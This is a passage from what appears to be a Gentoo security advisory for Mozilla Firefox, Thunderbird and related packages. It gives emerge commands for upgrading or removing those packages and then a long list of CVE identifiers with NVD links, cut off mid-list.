unmerge\n\"www-client/mozilla-firefox\" and then emerge the latest\n\"www-client/firefox\" package:\n\n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox\"\n # emerge --ask --oneshot --verbose \"\u003e=www-client/firefox-10.0.11\"\n\nThe \"www-client/mozilla-firefox-bin\" package has been merged into the\n\"www-client/firefox-bin\" package. To upgrade, please unmerge\n\"www-client/mozilla-firefox-bin\" and then emerge the latest\n\"www-client/firefox-bin\" package:\n\n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox-bin\"\n # emerge --ask --oneshot --verbose \"\u003e=www-client/firefox-bin-10.0.11\"=\n\n\nThe \"mail-client/mozilla-thunderbird\" package has been merged into the\n\"mail-client/thunderbird\" package. To upgrade, please unmerge\n\"mail-client/mozilla-thunderbird\" and then emerge the latest\n\"mail-client/thunderbird\" package:\n\n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird\"\n # emerge --ask --oneshot -v \"\u003e=mail-client/thunderbird-10.0.11\"\n\nThe \"mail-client/mozilla-thunderbird-bin\" package has been merged into\nthe \"mail-client/thunderbird-bin\" package. To upgrade, please unmerge\n\"mail-client/mozilla-thunderbird-bin\" and then emerge the latest\n\"mail-client/thunderbird-bin\" package:\n\n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird-bin\"\n # emerge --ask --oneshot -v \"\u003e=mail-client/thunderbird-bin-10.0.11\"\n\nGentoo discontinued support for GNU IceCat. We recommend that users\nunmerge GNU IceCat:\n\n # emerge --unmerge \"www-client/icecat\"\n\nGentoo discontinued support for XULRunner. We recommend that users\nunmerge XULRunner:\n\n # emerge --unmerge \"net-libs/xulrunner\"\n\nGentoo discontinued support for the XULRunner binary package. We\nrecommend that users unmerge XULRunner:\n\n # emerge --unmerge \"net-libs/xulrunner-bin\"\n\nReferences\n==========\n\n[ 1 ] CVE-2011-3101\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3101\n[ 2 ] CVE-2007-2436\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2436\n[ 3 ] CVE-2007-2437\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2437\n[ 4 ] CVE-2007-2671\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2671\n[ 5 ] CVE-2007-3073\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3073\n[ 6 ] CVE-2008-0016\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0016\n[ 7 ] CVE-2008-0017\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0017\n[ 8 ] CVE-2008-0367\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0367\n[ 9 ] CVE-2008-3835\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3835\n[ 10 ] CVE-2008-3836\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3836\n[ 11 ] CVE-2008-3837\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3837\n[ 12 ] CVE-2008-4058\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4058\n[ 13 ] CVE-2008-4059\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4059\n[ 14 ] CVE-2008-4060\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4060\n[ 15 ] CVE-2008-4061\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4061\n[ 16 ] CVE-2008-4062\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4062\n[ 17 ] CVE-2008-4063\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4063\n[ 18 ] CVE-2008-4064\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4064\n[ 19 ] CVE-2008-4065\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4065\n[ 20 ] CVE-2008-4066\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4066\n[ 21 ] CVE-2008-4067\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4067\n[ 22 ] CVE-2008-4068\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4068\n[ 23 ] CVE-2008-4069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4069\n[ 24 ] CVE-2008-4070\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4070\n[ 25 ] CVE-2008-4582\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4582\n[ 26 ] CVE-2008-5012\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5012\n[ 27 ] CVE-2008-5013\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5013\n[ 28 ] CVE-2008-5014\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5014\n[ 29 ] CVE-2008-5015\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5015\n[ 30 ] CVE-2008-5016\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5016\n[ 31 ] CVE-2008-5017\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5017\n[ 32 ] CVE-2008-5018\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5018\n[ 33 ] CVE-2008-5019\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5019\n[ 34 ] CVE-2008-5021\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5021\n[ 35 ] CVE-2008-5022\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5022\n[ 36 ] CVE-2008-5023\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5023\n[ 37 ] CVE-2008-5024\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5024\n[ 38 ] CVE-2008-5052\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5052\n[ 39 ] CVE-2008-5500\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5500\n[ 40 ] CVE-2008-5501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5501\n[ 41 ] CVE-2008-5502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5502\n[ 42 ] CVE-2008-5503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5503\n[ 43 ] CVE-2008-5504\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5504\n[ 44 ] CVE-2008-5505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5505\n[ 45 ] CVE-2008-5506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5506\n[ 46 ] CVE-2008-5507\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5507\n[ 47 ] CVE-2008-5508\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5508\n[ 48 ] CVE-2008-5510\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5510\n[ 49 ] CVE-2008-5511\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5511\n[ 50 ] CVE-2008-5512\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5512\n[ 51 ] CVE-2008-5513\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5513\n[ 52 ] CVE-2008-5822\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5822\n[ 53 ] CVE-2008-5913\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5913\n[ 54 ] CVE-2008-6961\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6961\n[ 55 ] CVE-2009-0071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071\n[ 56 ] CVE-2009-0071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0071\n[ 57 ] CVE-2009-0352\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0352\n[ 58 ] CVE-2009-0353\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0353\n[ 59 ] CVE-2009-0354\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0354\n[ 60 ] CVE-2009-0355\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0355\n[ 61 ] CVE-2009-0356\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0356\n[ 62 ] CVE-2009-0357\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0357\n[ 63 ] CVE-2009-0358\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0358\n[ 64 ] CVE-2009-0652\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0652\n[ 65 ] CVE-2009-0771\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0771\n[ 66 ] CVE-2009-0772\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0772\n[ 67 ] CVE-2009-0773\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0773\n[ 68 ] CVE-2009-0774\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0774\n[ 69 ] CVE-2009-0775\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0775\n[ 70 ] CVE-2009-0776\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0776\n[ 71 ] CVE-2009-0777\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0777\n[ 72 ] CVE-2009-1044\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1044\n[ 73 ] CVE-2009-1169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1169\n[ 74 ] CVE-2009-1302\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1302\n[ 75 ] CVE-2009-1303\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1303\n[ 76 ] CVE-2009-1304\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1304\n[ 77 ] CVE-2009-1305\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1305\n[ 78 ] CVE-2009-1306\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1306\n[ 79 ] CVE-2009-1307\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1307\n[ 80 ] CVE-2009-1308\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1308\n[ 81 ] CVE-2009-1309\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1309\n[ 82 ] CVE-2009-1310\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1310\n[ 83 ] CVE-2009-1311\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1311\n[ 84 ] CVE-2009-1312\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1312\n[ 85 ] CVE-2009-1313\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1313\n[ 86 ] CVE-2009-1392\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1392\n[ 87 ] CVE-2009-1563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1563\n[ 88 ] CVE-2009-1571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1571\n[ 89 ] CVE-2009-1828\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1828\n[ 90 ] CVE-2009-1832\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1832\n[ 91 ] CVE-2009-1833\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1833\n[ 92 ] CVE-2009-1834\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1834\n[ 93 ] CVE-2009-1835\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1835\n[ 94 ] CVE-2009-1836\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1836\n[ 95 ] CVE-2009-1837\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1837\n[ 96 ] CVE-2009-1838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1838\n[ 97 ] CVE-2009-1839\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1839\n[ 98 ] CVE-2009-1840\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1840\n[ 99 ] CVE-2009-1841\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1841\n[ 100 ] CVE-2009-2043\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2043\n[ 101 ] CVE-2009-2044\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2044\n[ 102 ] CVE-2009-2061\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2061\n[ 103 ] CVE-2009-2065\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2065\n[ 104 ] CVE-2009-2210\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2210\n[ 105 ] CVE-2009-2404\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2404\n[ 106 ] CVE-2009-2408\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2408\n[ 107 ] CVE-2009-2462\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2462\n[ 108 ] CVE-2009-2463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2463\n[ 109 ] CVE-2009-2464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2464\n[ 110 ] CVE-2009-2465\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2465\n[ 111 ] CVE-2009-2466\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2466\n[ 112 ] CVE-2009-2467\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2467\n[ 113 ] CVE-2009-2469\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2469\n[ 114 ] CVE-2009-2470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2470\n[ 115 ] CVE-2009-2471\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2471\n[ 116 ] CVE-2009-2472\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2472\n[ 117 ] CVE-2009-2477\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2477\n[ 118 ] CVE-2009-2478\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2478\n[ 119 ] CVE-2009-2479\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2479\n[ 120 ] CVE-2009-2535\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2535\n[ 121 ] CVE-2009-2654\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2654\n[ 122 ] CVE-2009-2662\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2662\n[ 123 ] CVE-2009-2664\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2664\n[ 124 ] CVE-2009-2665\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2665\n[ 125 ] CVE-2009-3069\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3069\n[ 126 ] CVE-2009-3070\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3070\n[ 127 ] CVE-2009-3071\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3071\n[ 128 ] CVE-2009-3072\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3072\n[ 129 ] CVE-2009-3074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3074\n[ 130 ] CVE-2009-3075\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3075\n[ 131 ] CVE-2009-3076\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3076\n[ 132 ] CVE-2009-3077\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3077\n[ 133 ] CVE-2009-3078\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3078\n[ 134 ] CVE-2009-3079\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3079\n[ 135 ] CVE-2009-3274\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3274\n[ 136 ] CVE-2009-3371\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3371\n[ 137 ] CVE-2009-3372\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3372\n[ 138 ] CVE-2009-3373\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3373\n[ 139 ] CVE-2009-3374\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3374\n[ 140 ] CVE-2009-3375\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3375\n[ 141 ] CVE-2009-3376\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3376\n[ 142 ] CVE-2009-3377\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3377\n[ 143 ] CVE-2009-3378\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3378\n[ 144 ] CVE-2009-3379\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3379\n[ 145 ] CVE-2009-3380\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3380\n[ 146 ] CVE-2009-3381\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3381\n[ 147 ] CVE-2009-3382\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3382\n[ 148 ] CVE-2009-3383\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3383\n[ 149 ] CVE-2009-3388\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3388\n[ 150 ] CVE-2009-3389\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3389\n[ 151 ] CVE-2009-3555\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555\n[ 152 ] CVE-2009-3978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3978\n[ 153 ] CVE-2009-3979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3979\n[ 154 ] CVE-2009-3980\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3980\n[ 155 ] CVE-2009-3981\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3981\n[ 156 ] CVE-2009-3982\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3982\n[ 157 ] CVE-2009-3983\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3983\n[ 158 ] CVE-2009-3984\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3984\n[ 159 ] CVE-2009-3985\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3985\n[ 160 ] CVE-2009-3986\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3986\n[ 161 ] CVE-2009-3987\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3987\n[ 162 ] CVE-2009-3988\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3988\n[ 163 ] CVE-2010-0159\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0159\n[ 164 ] CVE-2010-0160\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0160\n[ 165 ] CVE-2010-0162\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0162\n[ 166 ] CVE-2010-0163\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0163\n[ 167 ] CVE-2010-0164\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0164\n[ 168 ] CVE-2010-0165\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0165\n[ 169 ] CVE-2010-0166\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0166\n[ 170 ] CVE-2010-0167\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167\n[ 171 ] CVE-2010-0167\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167\n[ 172 ] CVE-2010-0168\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0168\n[ 173 ] CVE-2010-0169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169\n[ 174 ] CVE-2010-0169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169\n[ 175 ] CVE-2010-0170\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0170\n[ 176 ] CVE-2010-0171\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171\n[ 177 ] CVE-2010-0171\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171\n[ 178 ] CVE-2010-0172\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0172\n[ 179 ] CVE-2010-0173\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0173\n[ 180 ] CVE-2010-0174\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174\n[ 181 ] CVE-2010-0174\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174\n[ 182 ] CVE-2010-0175\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175\n[ 183 ] CVE-2010-0175\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175\n[ 184 ] CVE-2010-0176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176\n[ 185 ] CVE-2010-0176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176\n[ 186 ] CVE-2010-0177\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0177\n[ 187 ] CVE-2010-0178\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0178\n[ 188 ] CVE-2010-0179\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0179\n[ 189 ] CVE-2010-0181\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0181\n[ 190 ] CVE-2010-0182\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0182\n[ 191 ] CVE-2010-0183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0183\n[ 192 ] CVE-2010-0220\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0220\n[ 193 ] CVE-2010-0648\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0648\n[ 194 ] CVE-2010-0654\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0654\n[ 195 ] CVE-2010-1028\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1028\n[ 196 ] CVE-2010-1121\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1121\n[ 197 ] CVE-2010-1125\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1125\n[ 198 ] CVE-2010-1196\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1196\n[ 199 ] CVE-2010-1197\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1197\n[ 200 ] CVE-2010-1198\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1198\n[ 201 ] CVE-2010-1199\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1199\n[ 202 ] CVE-2010-1200\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1200\n[ 203 ] CVE-2010-1201\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1201\n[ 204 ] CVE-2010-1202\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1202\n[ 205 ] CVE-2010-1203\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1203\n[ 206 ] CVE-2010-1205\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205\n[ 207 ] CVE-2010-1206\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1206\n[ 208 ] CVE-2010-1207\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1207\n[ 209 ] CVE-2010-1208\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1208\n[ 210 ] CVE-2010-1209\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1209\n[ 211 ] CVE-2010-1210\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1210\n[ 212 ] CVE-2010-1211\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1211\n[ 213 ] CVE-2010-1212\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1212\n[ 214 ] CVE-2010-1213\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1213\n[ 215 ] CVE-2010-1214\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1214\n[ 216 ] CVE-2010-1215\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1215\n[ 217 ] CVE-2010-1585\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1585\n[ 218 ] CVE-2010-2751\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2751\n[ 219 ] CVE-2010-2752\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2752\n[ 220 ] CVE-2010-2753\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2753\n[ 221 ] CVE-2010-2754\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2754\n[ 222 ] CVE-2010-2755\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2755\n[ 223 ] CVE-2010-2760\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2760\n[ 224 ] CVE-2010-2762\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2762\n[ 225 ] CVE-2010-2763\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2763\n[ 226 ] CVE-2010-2764\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2764\n[ 227 ] CVE-2010-2765\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2765\n[ 228 ] CVE-2010-2766\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2766\n[ 229 ] CVE-2010-2767\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2767\n[ 230 ] CVE-2010-2768\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2768\n[ 231 ] CVE-2010-2769\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2769\n[ 232 ] CVE-2010-2770\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2770\n[ 233 ] CVE-2010-3131\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3131\n[ 234 ] CVE-2010-3166\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3166\n[ 235 ] CVE-2010-3167\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3167\n[ 236 ] CVE-2010-3168\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3168\n[ 237 ] CVE-2010-3169\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3169\n[ 238 ] CVE-2010-3170\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3170\n[ 239 ] CVE-2010-3171\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3171\n[ 240 ] CVE-2010-3173\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3173\n[ 241 ] CVE-2010-3174\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3174\n[ 242 ] CVE-2010-3175\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3175\n[ 243 ] CVE-2010-3176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3176\n[ 244 ] CVE-2010-3177\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3177\n[ 245 ] CVE-2010-3178\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3178\n[ 246 ] CVE-2010-3179\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3179\n[ 247 ] CVE-2010-3180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3180\n[ 248 ] CVE-2010-3182\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3182\n[ 249 ] CVE-2010-3183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3183\n[ 250 ] CVE-2010-3399\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3399\n[ 251 ] CVE-2010-3400\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3400\n[ 252 ] CVE-2010-3765\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3765\n[ 253 ] CVE-2010-3766\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3766\n[ 254 ] CVE-2010-3767\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3767\n[ 255 ] CVE-2010-3768\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3768\n[ 256 ] CVE-2010-3769\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3769\n[ 257 ] CVE-2010-3770\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3770\n[ 258 ] CVE-2010-3771\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3771\n[ 259 ] CVE-2010-3772\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3772\n[ 260 ] CVE-2010-3773\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3773\n[ 261 ] CVE-2010-3774\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3774\n[ 262 ] CVE-2010-3775\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3775\n[ 263 ] CVE-2010-3776\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3776\n[ 264 ] CVE-2010-3777\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3777\n[ 265 ] CVE-2010-3778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3778\n[ 266 ] CVE-2010-4508\n 